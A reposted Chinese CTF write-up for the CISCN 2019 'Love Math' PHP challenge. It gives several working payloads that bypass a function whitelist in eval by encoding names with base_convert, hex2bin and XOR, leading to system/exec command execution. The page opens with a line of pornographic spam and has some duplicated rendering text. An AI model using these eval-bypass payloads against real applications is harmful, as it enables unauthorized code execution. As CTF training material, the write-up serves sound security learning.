国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

NSS [CISCN 2019初賽]Love Math

2年前作者:Jay 17分類:Toy博客閱讀(13)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了NSS [CISCN 2019初賽]Love Math。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

# NSS [CISCN 2019初賽]Love Math

開題直接給源碼

<?php
error_reporting(0);
//聽說你很喜歡數(shù)學(xué),不知道你是否愛它勝過愛flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太長了不會(huì)算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("請不要輸入奇奇怪怪的字符");
        }
    }
    //常用數(shù)學(xué)函數(shù)http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("請不要輸入奇奇怪怪的函數(shù)");
        }
    }
    //幫你算出答案
    eval('echo '.$content.';');            //最后變?yōu)閑val('echo tac /flag;');
}

代碼分析:

foreach():用來遍歷一個(gè)數(shù)組

preg_match_all():搜索content中所有匹配給定正則表達(dá)式的匹配結(jié)果并且將它們輸出到used_funcs中.

preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); 這行代碼使用正則表達(dá)式匹配數(shù)學(xué)表達(dá)式中的函數(shù)名,并將匹配的結(jié)果存儲(chǔ)在 $used_funcs 數(shù)組中。

dechex():將10進(jìn)制轉(zhuǎn)成16進(jìn)制。

hexdec():將16進(jìn)制轉(zhuǎn)成10進(jìn)制。

base_convert():base_convert(1001,2,10)是將二進(jìn)制的1001轉(zhuǎn)換為10進(jìn)制的9。

簡單掃一遍代碼,我們是從最后一句的 c o n t e n t 下手進(jìn)行 R C E , content下手進(jìn)行RCE, content下手進(jìn)行RCE,content是我們get方法傳參進(jìn)來的c。

c o n t e n t 要求長度小于 80 ,不能包含 content要求長度小于80,不能包含 content要求長度小于80,不能包含blacklist中的字符??梢允褂玫模喊酌麊沃械臄?shù)學(xué)函數(shù),.,^

方法一:動(dòng)態(tài)調(diào)用函數(shù)

什么是動(dòng)態(tài)調(diào)用函數(shù)?就是下面代碼會(huì)執(zhí)行會(huì)執(zhí)行 system(‘ls’);

$a='system';
$a('ls');

如果我們想構(gòu)造一個(gè)$_GET[pi]

首先中括號(hào)被禁用我們可以用花括號(hào)代替,變成$_GET{pi}

GET可以用base_convert()進(jìn)制轉(zhuǎn)換,把十進(jìn)制163983轉(zhuǎn)成62進(jìn)制獲得,但是_卻無法獲得。此路不通

PHP中有將16進(jìn)制轉(zhuǎn)成字符串的函數(shù)hex2bin(),十六進(jìn)制5f474554轉(zhuǎn)字符串就是_GET

那么我們hex2bin(5f474554)就能得到_GET,但是代碼過濾a-zA-Z所以我們加一步十進(jìn)制轉(zhuǎn)十六進(jìn)制。

hex2bin(dechex(1598506324))就能得到_GET。

那么hex2bin怎么獲得呢?

利用base_convert()將十進(jìn)制37907361743轉(zhuǎn)化為36進(jìn)制,得到hex2bin。 //動(dòng)態(tài)函數(shù)調(diào)用。

所以_GET=hex2bin(5f474554)=hex2bin(dechex(1598506324))=base_convert(37907361743,10,36)(dechex(1598506324))

payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag

方法二:利用getallheaders()函數(shù)

NSS [CISCN 2019初賽]Love Math,CTF-web(零散wp合集),web安全,網(wǎng)絡(luò)安全,PHP,安全

base_convert(696468,10,36)
//exec

$pi(8768397090111664438,10,30)
//getallheaders

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
//exec(getallheaders(){1})

payload:

?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

1=tac /flag

NSS [CISCN 2019初賽]Love Math,CTF-web(零散wp合集),web安全,網(wǎng)絡(luò)安全,PHP,安全

方法三:直接cat /flag

payload:

($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//exec('hex2bin(dechex(109270211257898))')
//exec('cat f*')

base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
//system('cat'.dechex(16)^asinh^pi)
//system('cat *')

此外

還有一種payload:【可以細(xì)細(xì)研究一下】

?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

NSS [CISCN 2019初賽]Love Math,CTF-web(零散wp合集),web安全,網(wǎng)絡(luò)安全,PHP,安全

總結(jié)一下:

利用 進(jìn)制轉(zhuǎn)換函數(shù)或者異或 構(gòu)造字符串從而進(jìn)行RCE。這題還是很巧妙的。文章來源地址http://www.zghlxwxcb.cn/news/detail-660107.html

到了這里,關(guān)于NSS [CISCN 2019初賽]Love Math的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【CTF-web】修改請求頭(XFF)

    【CTF-web】修改請求頭(XFF)

    題目鏈接:https://ctf.bugku.com/challenges/detail/id/79.html 隨意輸入后可以看到需要本地管理員登錄,得知這是一道需要修改XFF頭的題。 XFF即X-Forwarded-For,該請求標(biāo)頭是一個(gè)事實(shí)上的用于標(biāo)識(shí)通過代理服務(wù)器連接到 web 服務(wù)器的客戶端的原始 IP 地址的標(biāo)頭。我們可以通過偽造XFF頭來假

    2024年02月13日
    瀏覽(25)

  • 【CTF-web】變量1(php全局變量)

    題目鏈接:https://ctf.bugku.com/challenges/detail/id/76.html 注意到$$args,那么我們可以通過args輸入一個(gè)已定義變量的名稱來得到它的值,于是查詢php的九大全局變量,如下表所示。 變量 作用 $_POST 廣泛用于收集提交 method=“post” 的 HTML 表單后的表單數(shù)據(jù)。$_POST 也常用于傳遞變量。

    2024年02月12日
    瀏覽(20)
  • 安全 ctf-Web基礎(chǔ)_cookie欺騙

    安全 ctf-Web基礎(chǔ)_cookie欺騙

    題目描述 Cookie : ????????Cookie欺騙、認(rèn)證、偽造 解題思路: 1. 打開題目給的鏈接,顯示:hello guest. only admin can get flag. 2. 使用F12快捷鍵進(jìn)入開發(fā)者工具,選擇控制臺(tái),修改管理員 admin 的 Cookie 值為 1(True): document.cookie? ?#查看cookie document.cookie = \\\'admin = 1\\\'? #將admin的值修

    2024年04月28日
    瀏覽(23)
  • 青少年CTF-Web-帝國CMS1-3通關(guān)記錄

    青少年CTF-Web-帝國CMS1-3通關(guān)記錄

    本次進(jìn)通過平臺(tái)內(nèi)題目進(jìn)行,非真實(shí)環(huán)境。 首先下發(fā)題目鏈接 我們首先先找后臺(tái)看看 后臺(tái)地址為 /e/admin/ 隨后,經(jīng)過dirsearch進(jìn)行掃描,得到了一個(gè)www.zip 訪問掃描到的www.zip,得到網(wǎng)站源碼 使用D盾掃描,得到eval后門。 蟻劍鏈接 得到根目錄的Flag 這道題目和CMS01差不多,但是

    2024年02月03日
    瀏覽(32)
  • [CISCN 2019華北Day1]Web1

    [CISCN 2019華北Day1]Web1

    phar反序列化 文件讀取 打開題目,注冊用戶為admin 進(jìn)去發(fā)現(xiàn)有文件上傳的功能,我們隨便上傳個(gè)圖片 然后就有下載和刪除兩個(gè)功能 我們嘗試抓包下載文件的功能 發(fā)現(xiàn)參數(shù)可控,我們嘗試讀取一下 既然能讀出來,我們繼續(xù)讀一下源碼 源碼 繼續(xù)讀取class.php 分析一下class.php 我

    2024年02月09日
    瀏覽(41)
  • 【CTF-web】備份是個(gè)好習(xí)慣(查找備份文件、雙寫繞過、md5加密繞過)

    【CTF-web】備份是個(gè)好習(xí)慣(查找備份文件、雙寫繞過、md5加密繞過)

    題目鏈接:https://ctf.bugku.com/challenges/detail/id/83.html 經(jīng)過掃描可以找到index.php.bak備份文件,下載下來后打開發(fā)現(xiàn)是index.php的原代碼,如下圖所示。 由代碼可知我們要繞過md5加密,兩數(shù)如果滿足科學(xué)計(jì)數(shù)法的形式的話,php會(huì)將其當(dāng)作科學(xué)計(jì)數(shù)法所得的數(shù)字來進(jìn)行比較,根據(jù)該原

    2024年02月12日
    瀏覽(15)
  • [2022CISCN]初賽 復(fù)現(xiàn)

    [2022CISCN]初賽 復(fù)現(xiàn)

    剛開始直接提取usb鍵盤流量,發(fā)現(xiàn)導(dǎo)出有問題 鍵盤流量,搜索8個(gè)字節(jié)長度的數(shù)據(jù)包,這里也能發(fā)現(xiàn)版本有2.8.1和2.10.1兩種,因此猜測需要分別導(dǎo)出 提取出兩段數(shù)據(jù)? ?然后拿腳本去解鍵盤流量,分別得到數(shù)據(jù)如下 第一個(gè)數(shù)據(jù)用010保存16進(jìn)制文件,得到一個(gè)rar文件 第二個(gè)數(shù)據(jù)

    2024年02月08日
    瀏覽(13)

  • 全國大學(xué)生信息安全競賽初賽writeup(歷年CISCN真題與解析)

    收錄了大佬們參加全國大學(xué)生信息安全競賽初賽的writeup和真題環(huán)境,方便學(xué)習(xí),排名不分先后,謹(jǐn)參考完整度和CSDN站內(nèi)優(yōu)先原則。 在此,對大佬們的分享表示由衷的敬意和誠摯的感謝! 第十二、十三屆全國大學(xué)生信息安全競賽——?jiǎng)?chuàng)新實(shí)踐能力賽原題 如果遇到打不開的鏈

    2024年02月06日
    瀏覽(46)
  • ciscn_2019_s_9

    ciscn_2019_s_9

    32位,啥也沒開,開心愉悅寫shellcode 程序主要在這里,棧溢出,寫shellcode進(jìn)去然后執(zhí)行,發(fā)現(xiàn)有個(gè)hint 這里有個(gè)jmp,ok好辦了 思路 寫shellcode,然后用jmp跳轉(zhuǎn)到shellcode的頭,然后執(zhí)行shellcode 因?yàn)闂V挥?x20大小,所以不能使用pwntools生成的shellcode 這個(gè)是0x17大小的shellcode,平時(shí)收

    2024年02月07日
    瀏覽(20)
  • buuctf PWN ciscn_2019_c_1

    buuctf PWN ciscn_2019_c_1

    encrypt()里面get函數(shù)存在溢出點(diǎn)offest=0x50+8。puts()可以用來泄露libc基址。 amd64的參數(shù)調(diào)用順序是如下序列的自后而前,即:完成傳遞參數(shù)(地址)-本函數(shù)地址 - 返回地址 ... - pop_rdi;ret - argv - call_addr - ret_address 獲得本elf中的gadgets: ROPgadget --binary ./ciscn_2019_c_1 --only \\\"pop|ret\\\" ROPgadg

    2024年02月07日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包